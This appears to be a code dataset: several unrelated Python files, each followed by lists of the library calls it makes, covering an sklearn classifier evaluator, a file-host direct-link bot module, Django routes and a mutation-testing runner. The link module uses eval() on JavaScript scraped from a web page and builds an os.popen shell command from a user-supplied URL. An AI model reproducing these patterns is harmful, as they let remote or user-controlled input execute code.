10763), False, 'from sampleForIntegral import integrateOfExponentialOverSimplexInduction2\n'), ((10910, 11016), 'sampleForIntegral.integrateOfExponentialOverSimplexInduction2', 'integrateOfExponentialOverSimplexInduction2', (['teta'], {'grad': 'c', 'requires_grad': 'requires_grad', 'device': 'device'}), '(teta, grad=c, requires_grad=\n requires_grad, device=device)\n', (10953, 11016), False, 'from sampleForIntegral import integrateOfExponentialOverSimplexInduction2\n')]
|
# import numpy as np
from sklearn.pipeline import Pipeline
# from sklearn.svm import SVC, SVR
from sklearn.linear_model import SGDClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.model_selection import cross_val_predict
from sklearn.metrics import accuracy_score, classification_report
# import fire
def easy_eval_clf(X, y, verbose=True):
""""""
# init model (SVC)
# clf = SVC(kernel='linear')
clf = SGDClassifier(n_jobs=-1)
if X.shape[1] < X.shape[0] * 2:
preproc = StandardScaler()
else: # empirical dimension reduction for extreme cases
preproc = PCA(n_components=X.shape[0] * 2, whiten=True)
pl = Pipeline([('preproc', preproc), ('clf', clf)])
# fire cross validation
y_ = cross_val_predict(pl, X, y, cv=10)
# simple evaluation
acc = accuracy_score(y, y_)
cr = classification_report(y, y_)
if verbose:
print(cr)
print
print('Accuracy : {:.2%}'.format(acc))
return acc
class EasyEval:
""""""
def __init__(self, n_trial=1):
""""""
self.n_trial = n_trial
def eval(self):
for n in xrange(self.n_trial):
pass # do evaluation here
if __name__ == '__main__':
pass
|
[
"sklearn.preprocessing.StandardScaler",
"sklearn.linear_model.SGDClassifier",
"sklearn.metrics.accuracy_score",
"sklearn.model_selection.cross_val_predict",
"sklearn.metrics.classification_report",
"sklearn.decomposition.PCA",
"sklearn.pipeline.Pipeline"
] |
[((482, 506), 'sklearn.linear_model.SGDClassifier', 'SGDClassifier', ([], {'n_jobs': '(-1)'}), '(n_jobs=-1)\n', (495, 506), False, 'from sklearn.linear_model import SGDClassifier\n'), ((714, 760), 'sklearn.pipeline.Pipeline', 'Pipeline', (["[('preproc', preproc), ('clf', clf)]"], {}), "([('preproc', preproc), ('clf', clf)])\n", (722, 760), False, 'from sklearn.pipeline import Pipeline\n'), ((799, 833), 'sklearn.model_selection.cross_val_predict', 'cross_val_predict', (['pl', 'X', 'y'], {'cv': '(10)'}), '(pl, X, y, cv=10)\n', (816, 833), False, 'from sklearn.model_selection import cross_val_predict\n'), ((869, 890), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['y', 'y_'], {}), '(y, y_)\n', (883, 890), False, 'from sklearn.metrics import accuracy_score, classification_report\n'), ((900, 928), 'sklearn.metrics.classification_report', 'classification_report', (['y', 'y_'], {}), '(y, y_)\n', (921, 928), False, 'from sklearn.metrics import accuracy_score, classification_report\n'), ((562, 578), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (576, 578), False, 'from sklearn.preprocessing import StandardScaler\n'), ((658, 703), 'sklearn.decomposition.PCA', 'PCA', ([], {'n_components': '(X.shape[0] * 2)', 'whiten': '(True)'}), '(n_components=X.shape[0] * 2, whiten=True)\n', (661, 703), False, 'from sklearn.decomposition import PCA\n')]
|
import json
import re
import urllib.parse
from os import popen
from random import choice
import requests
from bs4 import BeautifulSoup
from bot.helper.ext_utils.exceptions import DirectDownloadLinkException
def direct_link_generator(link: str):
""" direct links generator """
if not link:
raise DirectDownloadLinkException("`No links found!`")
elif 'zippyshare.com' in link:
return zippy_share(link)
elif 'yadi.sk' in link:
return yandex_disk(link)
elif 'cloud.mail.ru' in link:
return cm_ru(link)
elif 'mediafire.com' in link:
return mediafire(link)
elif 'osdn.net' in link:
return osdn(link)
elif 'github.com' in link:
return github(link)
else:
raise DirectDownloadLinkException(f'No Direct link function found for {link}')
def zippy_share(url: str) -> str:
""" ZippyShare direct links generator
Based on https://github.com/LameLemon/ziggy"""
dl_url = ''
try:
link = re.findall(r'\bhttps?://.*zippyshare\.com\S+', url)[0]
except IndexError:
raise DirectDownloadLinkException("`No ZippyShare links found`\n")
session = requests.Session()
base_url = re.search('http.+.com', link).group()
response = session.get(link)
page_soup = BeautifulSoup(response.content, "lxml")
scripts = page_soup.find_all("script", {"type": "text/javascript"})
for script in scripts:
if "getElementById('dlbutton')" in script.text:
url_raw = re.search(r'= (?P<url>\".+\" \+ (?P<math>\(.+\)) .+);',
script.text).group('url')
math = re.search(r'= (?P<url>\".+\" \+ (?P<math>\(.+\)) .+);',
script.text).group('math')
dl_url = url_raw.replace(math, '"' + str(eval(math)) + '"')
break
dl_url = base_url + eval(dl_url)
name = urllib.parse.unquote(dl_url.split('/')[-1])
return dl_url
def yandex_disk(url: str) -> str:
""" Yandex.Disk direct links generator
Based on https://github.com/wldhx/yadisk-direct"""
try:
link = re.findall(r'\bhttps?://.*yadi\.sk\S+', url)[0]
except IndexError:
reply = "`No Yandex.Disk links found`\n"
return reply
api = 'https://cloud-api.yandex.net/v1/disk/public/resources/download?public_key={}'
try:
dl_url = requests.get(api.format(link)).json()['href']
return dl_url
except KeyError:
raise DirectDownloadLinkException("`Error: File not found / Download limit reached`\n")
def cm_ru(url: str) -> str:
""" cloud.mail.ru direct links generator
Using https://github.com/JrMasterModelBuilder/cmrudl.py"""
reply = ''
try:
link = re.findall(r'\bhttps?://.*cloud\.mail\.ru\S+', url)[0]
except IndexError:
raise DirectDownloadLinkException("`No cloud.mail.ru links found`\n")
command = f'vendor/cmrudl.py/cmrudl -s {link}'
result = popen(command).read()
result = result.splitlines()[-1]
try:
data = json.loads(result)
except json.decoder.JSONDecodeError:
raise DirectDownloadLinkException("`Error: Can't extract the link`\n")
dl_url = data['download']
return dl_url
def mediafire(url: str) -> str:
""" MediaFire direct links generator """
try:
link = re.findall(r'\bhttps?://.*mediafire\.com\S+', url)[0]
except IndexError:
raise DirectDownloadLinkException("`No MediaFire links found`\n")
page = BeautifulSoup(requests.get(link).content, 'lxml')
info = page.find('a', {'aria-label': 'Download file'})
dl_url = info.get('href')
return dl_url
def osdn(url: str) -> str:
""" OSDN direct links generator """
osdn_link = 'https://osdn.net'
try:
link = re.findall(r'\bhttps?://.*osdn\.net\S+', url)[0]
except IndexError:
raise DirectDownloadLinkException("`No OSDN links found`\n")
page = BeautifulSoup(
requests.get(link, allow_redirects=True).content, 'lxml')
info = page.find('a', {'class': 'mirror_link'})
link = urllib.parse.unquote(osdn_link + info['href'])
mirrors = page.find('form', {'id': 'mirror-select-form'}).findAll('tr')
urls = []
for data in mirrors[1:]:
mirror = data.find('input')['value']
urls.append(re.sub(r'm=(.*)&f', f'm={mirror}&f', link))
return urls[0]
def github(url: str) -> str:
""" GitHub direct links generator """
try:
re.findall(r'\bhttps?://.*github\.com.*releases\S+', url)[0]
except IndexError:
raise DirectDownloadLinkException("`No GitHub Releases links found`\n")
download = requests.get(url, stream=True, allow_redirects=False)
try:
dl_url = download.headers["location"]
return dl_url
except KeyError:
raise DirectDownloadLinkException("`Error: Can't extract the link`\n")
def useragent():
"""
useragent random setter
"""
useragents = BeautifulSoup(
requests.get(
'https://developers.whatismybrowser.com/'
'useragents/explore/operating_system_name/android/').content,
'lxml').findAll('td', {'class': 'useragent'})
user_agent = choice(useragents)
return user_agent.text
|
[
"json.loads",
"bot.helper.ext_utils.exceptions.DirectDownloadLinkException",
"requests.Session",
"os.popen",
"random.choice",
"re.findall",
"requests.get",
"bs4.BeautifulSoup",
"re.search",
"re.sub"
] |
[((1210, 1228), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1226, 1228), False, 'import requests\n'), ((1334, 1373), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content', '"""lxml"""'], {}), "(response.content, 'lxml')\n", (1347, 1373), False, 'from bs4 import BeautifulSoup\n'), ((4758, 4811), 'requests.get', 'requests.get', (['url'], {'stream': '(True)', 'allow_redirects': '(False)'}), '(url, stream=True, allow_redirects=False)\n', (4770, 4811), False, 'import requests\n'), ((5322, 5340), 'random.choice', 'choice', (['useragents'], {}), '(useragents)\n', (5328, 5340), False, 'from random import choice\n'), ((334, 382), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`No links found!`"""'], {}), "('`No links found!`')\n", (361, 382), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((3118, 3136), 'json.loads', 'json.loads', (['result'], {}), '(result)\n', (3128, 3136), False, 'import json\n'), ((1040, 1093), 're.findall', 're.findall', (['"""\\\\bhttps?://.*zippyshare\\\\.com\\\\S+"""', 'url'], {}), "('\\\\bhttps?://.*zippyshare\\\\.com\\\\S+', url)\n", (1050, 1093), False, 'import re\n'), ((1134, 1194), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`No ZippyShare links found`\n"""'], {}), "('`No ZippyShare links found`\\n')\n", (1161, 1194), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((1245, 1274), 're.search', 're.search', (['"""http.+.com"""', 'link'], {}), "('http.+.com', link)\n", (1254, 1274), False, 'import re\n'), ((2173, 2219), 're.findall', 're.findall', (['"""\\\\bhttps?://.*yadi\\\\.sk\\\\S+"""', 'url'], {}), "('\\\\bhttps?://.*yadi\\\\.sk\\\\S+', url)\n", (2183, 2219), False, 'import re\n'), ((2541, 2627), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`Error: File not found / Download limit 
reached`\n"""'], {}), "(\n '`Error: File not found / Download limit reached`\\n')\n", (2568, 2627), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((2808, 2862), 're.findall', 're.findall', (['"""\\\\bhttps?://.*cloud\\\\.mail\\\\.ru\\\\S+"""', 'url'], {}), "('\\\\bhttps?://.*cloud\\\\.mail\\\\.ru\\\\S+', url)\n", (2818, 2862), False, 'import re\n'), ((2902, 2965), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`No cloud.mail.ru links found`\n"""'], {}), "('`No cloud.mail.ru links found`\\n')\n", (2929, 2965), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((3032, 3046), 'os.popen', 'popen', (['command'], {}), '(command)\n', (3037, 3046), False, 'from os import popen\n'), ((3194, 3258), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`Error: Can\'t extract the link`\n"""'], {}), '("`Error: Can\'t extract the link`\\n")\n', (3221, 3258), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((3418, 3470), 're.findall', 're.findall', (['"""\\\\bhttps?://.*mediafire\\\\.com\\\\S+"""', 'url'], {}), "('\\\\bhttps?://.*mediafire\\\\.com\\\\S+', url)\n", (3428, 3470), False, 'import re\n'), ((3511, 3570), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`No MediaFire links found`\n"""'], {}), "('`No MediaFire links found`\\n')\n", (3538, 3570), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((3597, 3615), 'requests.get', 'requests.get', (['link'], {}), '(link)\n', (3609, 3615), False, 'import requests\n'), ((3878, 3925), 're.findall', 're.findall', (['"""\\\\bhttps?://.*osdn\\\\.net\\\\S+"""', 'url'], {}), "('\\\\bhttps?://.*osdn\\\\.net\\\\S+', url)\n", (3888, 3925), False, 'import re\n'), ((3966, 4020), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 
'DirectDownloadLinkException', (['"""`No OSDN links found`\n"""'], {}), "('`No OSDN links found`\\n')\n", (3993, 4020), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((4057, 4097), 'requests.get', 'requests.get', (['link'], {'allow_redirects': '(True)'}), '(link, allow_redirects=True)\n', (4069, 4097), False, 'import requests\n'), ((4416, 4457), 're.sub', 're.sub', (['"""m=(.*)&f"""', 'f"""m={mirror}&f"""', 'link'], {}), "('m=(.*)&f', f'm={mirror}&f', link)\n", (4422, 4457), False, 'import re\n'), ((4576, 4635), 're.findall', 're.findall', (['"""\\\\bhttps?://.*github\\\\.com.*releases\\\\S+"""', 'url'], {}), "('\\\\bhttps?://.*github\\\\.com.*releases\\\\S+', url)\n", (4586, 4635), False, 'import re\n'), ((4676, 4741), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`No GitHub Releases links found`\n"""'], {}), "('`No GitHub Releases links found`\\n')\n", (4703, 4741), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((4929, 4993), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['"""`Error: Can\'t extract the link`\n"""'], {}), '("`Error: Can\'t extract the link`\\n")\n', (4956, 4993), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n'), ((1555, 1627), 're.search', 're.search', (['"""= (?P<url>\\\\".+\\\\" \\\\+ (?P<math>\\\\(.+\\\\)) .+);"""', 'script.text'], {}), '(\'= (?P<url>\\\\".+\\\\" \\\\+ (?P<math>\\\\(.+\\\\)) .+);\', script.text)\n', (1564, 1627), False, 'import re\n'), ((1690, 1762), 're.search', 're.search', (['"""= (?P<url>\\\\".+\\\\" \\\\+ (?P<math>\\\\(.+\\\\)) .+);"""', 'script.text'], {}), '(\'= (?P<url>\\\\".+\\\\" \\\\+ (?P<math>\\\\(.+\\\\)) .+);\', script.text)\n', (1699, 1762), False, 'import re\n'), ((5105, 5219), 'requests.get', 'requests.get', 
(['"""https://developers.whatismybrowser.com/useragents/explore/operating_system_name/android/"""'], {}), "(\n 'https://developers.whatismybrowser.com/useragents/explore/operating_system_name/android/'\n )\n", (5117, 5219), False, 'import requests\n'), ((790, 862), 'bot.helper.ext_utils.exceptions.DirectDownloadLinkException', 'DirectDownloadLinkException', (['f"""No Direct link function found for {link}"""'], {}), "(f'No Direct link function found for {link}')\n", (817, 862), False, 'from bot.helper.ext_utils.exceptions import DirectDownloadLinkException\n')]
|
from rest_framework.routers import DefaultRouter
from django.urls import path,include,re_path
from . import views
from .views import UserProfileViewSet,accountView,loginView,registerView
router = DefaultRouter()
router.register('profiles',UserProfileViewSet,base_name='user-profile-viewset')
urlpatterns = [
path('',include(router.urls)),
path('user/',accountView,name='account_email_verification_sent'),
path('login/',loginView,name='account_login'),
path('register/',registerView,name='account_signup'),
#re_path(r'email_exists/(?P<data>\w+|[\w.%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4})$',views.email_exists,name="email_exists"),
path('email_exists/<str:email>/',views.email_exists, name="email_exists"),
path('forgot_password/',views.forgot_password, name="forgot_password"),
path('change/',views.change, name="change"),
]
|
[
"django.urls.path",
"rest_framework.routers.DefaultRouter",
"django.urls.include"
] |
[((197, 212), 'rest_framework.routers.DefaultRouter', 'DefaultRouter', ([], {}), '()\n', (210, 212), False, 'from rest_framework.routers import DefaultRouter\n'), ((349, 415), 'django.urls.path', 'path', (['"""user/"""', 'accountView'], {'name': '"""account_email_verification_sent"""'}), "('user/', accountView, name='account_email_verification_sent')\n", (353, 415), False, 'from django.urls import path, include, re_path\n'), ((419, 466), 'django.urls.path', 'path', (['"""login/"""', 'loginView'], {'name': '"""account_login"""'}), "('login/', loginView, name='account_login')\n", (423, 466), False, 'from django.urls import path, include, re_path\n'), ((470, 524), 'django.urls.path', 'path', (['"""register/"""', 'registerView'], {'name': '"""account_signup"""'}), "('register/', registerView, name='account_signup')\n", (474, 524), False, 'from django.urls import path, include, re_path\n'), ((653, 727), 'django.urls.path', 'path', (['"""email_exists/<str:email>/"""', 'views.email_exists'], {'name': '"""email_exists"""'}), "('email_exists/<str:email>/', views.email_exists, name='email_exists')\n", (657, 727), False, 'from django.urls import path, include, re_path\n'), ((732, 803), 'django.urls.path', 'path', (['"""forgot_password/"""', 'views.forgot_password'], {'name': '"""forgot_password"""'}), "('forgot_password/', views.forgot_password, name='forgot_password')\n", (736, 803), False, 'from django.urls import path, include, re_path\n'), ((808, 852), 'django.urls.path', 'path', (['"""change/"""', 'views.change'], {'name': '"""change"""'}), "('change/', views.change, name='change')\n", (812, 852), False, 'from django.urls import path, include, re_path\n'), ((322, 342), 'django.urls.include', 'include', (['router.urls'], {}), '(router.urls)\n', (329, 342), False, 'from django.urls import path, include, re_path\n')]
|
import argparse
import logging
import math
import time
from threading import Thread
from typing import List
import pandas as pd
from mutester.data_analysis import DataAnalysis
from mutester.data_crawler import DataCrawler
def analysis_thread(repository_path, environment_path, mutant_ids: List[int], results: List[DataAnalysis], timeout):
data_analysis = DataAnalysis(repository_path, environment_path, timeout)
data_analysis.collect_data(mutant_ids)
results.append(data_analysis)
# data_analysis.store_data_to_disk(args.filename, args.merge)
def store_data_to_disk(filename: str, merge: str, datas: List[DataAnalysis]):
mutants_and_tests = pd.DataFrame()
if merge != '':
mutants_and_tests = pd.read_pickle(merge)
print('Read in {} executions to merge from {}'.format(len(mutants_and_tests), merge))
for data_analysis in datas:
mutants_and_tests = mutants_and_tests.append(
data_analysis.mutants.set_index('mutant_id').join(data_analysis.executions.set_index('mutant_id'),
lsuffix='_mutant', rsuffix='_execution').reset_index(),
ignore_index=True,
)
timestring = time.strftime("%Y%m%d-%H%M%S")
pickle_name = timestring + '_' + filename + '.pkl'
mutants_and_tests.to_pickle(pickle_name)
print("Wrote: {}\n".format(pickle_name))
total_tests = len(mutants_and_tests)
print(mutants_and_tests)
total_failed_tests = len(mutants_and_tests[mutants_and_tests["outcome"] == False])
print('Total number of tests: {}\n Total failed number of tests: {}'.format(total_tests, total_failed_tests))
return pickle_name
def main():
argument_parser = argparse.ArgumentParser(
description='Run mutation testing with record of failed test to pandas dataframe'
)
argument_parser.add_argument('repository_path',
help='Path to the repository to be tested')
argument_parser.add_argument('environment_path',
help='Path to the python environment to run the tests. Make sure the module is '
'installed in -e mode, and that pytest, pytest-json, mutmut are available')
argument_parser.add_argument('interval_start',
help='Test to start with')
argument_parser.add_argument('interval_end',
help='Test to end with (exlusive)')
argument_parser.add_argument('-m', '--merge',
help='Add a path to the pickle file, the end result should be merged with.'
'Helpful if the process was aborted, and you want to run some tests again.',
default='')
argument_parser.add_argument('--filename', action='store', default='dataframe')
argument_parser.add_argument('-v', '--verbose', action='store_true')
argument_parser.add_argument('-j', '--thread_count', action='store', default=1)
argument_parser.add_argument('--timed_testruns', action='store', default=2,
help='Number of dry testruns to find out after which time the testsruns should be '
'aborted')
args = argument_parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.INFO)
timed_run_count = int(args.timed_testruns)
timed_crawler = DataCrawler(args.repository_path, args.environment_path)
# TODO: Baseline runs only if pytest-json and pytest-timeout have been installed, which happens later
start_time = time.time()
for _ in range(timed_run_count):
timed_crawler.execute_test(-1)
test_baseline_time = math.ceil((time.time() - start_time) / timed_run_count)
logging.info('Measured %i seconds of runtime\n Test with higher than 10 times the baseline will be killed',
test_baseline_time)
thread_count = int(args.thread_count)
threads = []
interval_start = int(args.interval_start)
interval_end = int(args.interval_end)
interval_length = int((interval_end - interval_start) / thread_count)
results = []
for thread_number in range(thread_count - 1):
thread_interval_start = interval_start + thread_number * interval_length
mutant_ids = list(range(thread_interval_start, thread_interval_start + interval_length))
threads.append(Thread(target=analysis_thread,
args=(args.repository_path, args.environment_path, mutant_ids, results,
test_baseline_time * 10)))
threads.append(Thread(target=analysis_thread,
args=(args.repository_path, args.environment_path,
list(range(interval_start + (thread_count - 1) * interval_length, interval_end)),
results, test_baseline_time * 10)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
store_data_to_disk(args.filename, args.merge, results)
return 0
if __name__ == "__main__":
exit(main())
|
[
"pandas.DataFrame",
"threading.Thread",
"argparse.ArgumentParser",
"logging.basicConfig",
"mutester.data_crawler.DataCrawler",
"time.strftime",
"time.time",
"logging.info",
"mutester.data_analysis.DataAnalysis",
"pandas.read_pickle"
] |
[((363, 419), 'mutester.data_analysis.DataAnalysis', 'DataAnalysis', (['repository_path', 'environment_path', 'timeout'], {}), '(repository_path, environment_path, timeout)\n', (375, 419), False, 'from mutester.data_analysis import DataAnalysis\n'), ((667, 681), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (679, 681), True, 'import pandas as pd\n'), ((1220, 1250), 'time.strftime', 'time.strftime', (['"""%Y%m%d-%H%M%S"""'], {}), "('%Y%m%d-%H%M%S')\n", (1233, 1250), False, 'import time\n'), ((1726, 1837), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Run mutation testing with record of failed test to pandas dataframe"""'}), "(description=\n 'Run mutation testing with record of failed test to pandas dataframe')\n", (1749, 1837), False, 'import argparse\n'), ((3471, 3527), 'mutester.data_crawler.DataCrawler', 'DataCrawler', (['args.repository_path', 'args.environment_path'], {}), '(args.repository_path, args.environment_path)\n', (3482, 3527), False, 'from mutester.data_crawler import DataCrawler\n'), ((3652, 3663), 'time.time', 'time.time', ([], {}), '()\n', (3661, 3663), False, 'import time\n'), ((3825, 3965), 'logging.info', 'logging.info', (['"""Measured %i seconds of runtime\n Test with higher than 10 times the baseline will be killed"""', 'test_baseline_time'], {}), '(\n """Measured %i seconds of runtime\n Test with higher than 10 times the baseline will be killed"""\n , test_baseline_time)\n', (3837, 3965), False, 'import logging\n'), ((730, 751), 'pandas.read_pickle', 'pd.read_pickle', (['merge'], {}), '(merge)\n', (744, 751), True, 'import pandas as pd\n'), ((3363, 3402), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (3382, 3402), False, 'import logging\n'), ((4462, 4595), 'threading.Thread', 'Thread', ([], {'target': 'analysis_thread', 'args': '(args.repository_path, args.environment_path, mutant_ids, results, \n test_baseline_time * 10)'}), 
'(target=analysis_thread, args=(args.repository_path, args.\n environment_path, mutant_ids, results, test_baseline_time * 10))\n', (4468, 4595), False, 'from threading import Thread\n'), ((3776, 3787), 'time.time', 'time.time', ([], {}), '()\n', (3785, 3787), False, 'import time\n')]
|
#-*- coding: utf-8 -*-
from threading import Thread
import time
def loop(idx, nsec):
print("start loop", idx, " at ", time.ctime())
time.sleep(nsec)
print("start loop", idx, " at ", time.ctime())
def main():
print("Process start at ", time.ctime())
thread0 = Thread(target=loop, args=(0, 4))
thread0.start()
thread1 = Thread(target=loop, args=(1, 2))
thread1.start()
thread0.join()
thread1.join()
print("Process done at ", time.ctime())
if "__main__" == __name__:
main()
|
[
"threading.Thread",
"time.ctime",
"time.sleep"
] |
[((141, 157), 'time.sleep', 'time.sleep', (['nsec'], {}), '(nsec)\n', (151, 157), False, 'import time\n'), ((281, 313), 'threading.Thread', 'Thread', ([], {'target': 'loop', 'args': '(0, 4)'}), '(target=loop, args=(0, 4))\n', (287, 313), False, 'from threading import Thread\n'), ((348, 380), 'threading.Thread', 'Thread', ([], {'target': 'loop', 'args': '(1, 2)'}), '(target=loop, args=(1, 2))\n', (354, 380), False, 'from threading import Thread\n'), ((123, 135), 'time.ctime', 'time.ctime', ([], {}), '()\n', (133, 135), False, 'import time\n'), ((195, 207), 'time.ctime', 'time.ctime', ([], {}), '()\n', (205, 207), False, 'import time\n'), ((253, 265), 'time.ctime', 'time.ctime', ([], {}), '()\n', (263, 265), False, 'import time\n'), ((470, 482), 'time.ctime', 'time.ctime', ([], {}), '()\n', (480, 482), False, 'import time\n')]
|